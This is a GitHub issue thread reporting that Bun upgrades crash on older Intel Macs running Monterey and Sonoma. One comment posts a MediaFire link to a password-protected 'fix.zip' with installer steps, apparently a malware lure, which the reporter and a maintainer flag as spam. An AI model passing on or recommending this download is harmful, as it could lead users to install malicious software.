### ISSUE TITLE
Bun Upgrade crashes after version 1.1.20 in macOS Monterey 12.2

### ISSUE THREAD

**Issue by muhad-bk** [oven-sh/bun#13542]
### How can we reproduce the crash?

After upgrading bun crashes on macOS Monterey 12.2 , 1.8 GHz Dual-Core Intel Core i5, 8 GB 1600 MHz DDR3. 

![Screenshot 2024-08-26 at 3 43 44 PM](https://github.com/user-attachments/assets/1723f7c4-93db-499c-9728-26de51bfe537)

![Screenshot 2024-08-26 at 3 46 56 PM](https://github.com/user-attachments/assets/22aab79c-1b3a-4004-9900-6536f679ef56)

### Stack Trace (bun.report)

I'm not sure how to take it other logs,

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by muhad-bk** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Is this command spam. ?

Its looks like a malware :)

**Comment by Jarred-Sumner** [comment]
yeah deleting is probably the right move rather than marking as spam & blocking

**Comment by nephcode** [comment]
Same issue on mac Mini but i note that :
Node update OK : 22.7 (brew)
Deno (no update after 1.45)
Bun (no update after 1.1.21) (bun upgrade, npm, brew) 

2 Macs (mac mini 2012 / Mac Book Pro 2012 - Sonoma with OpenCore )
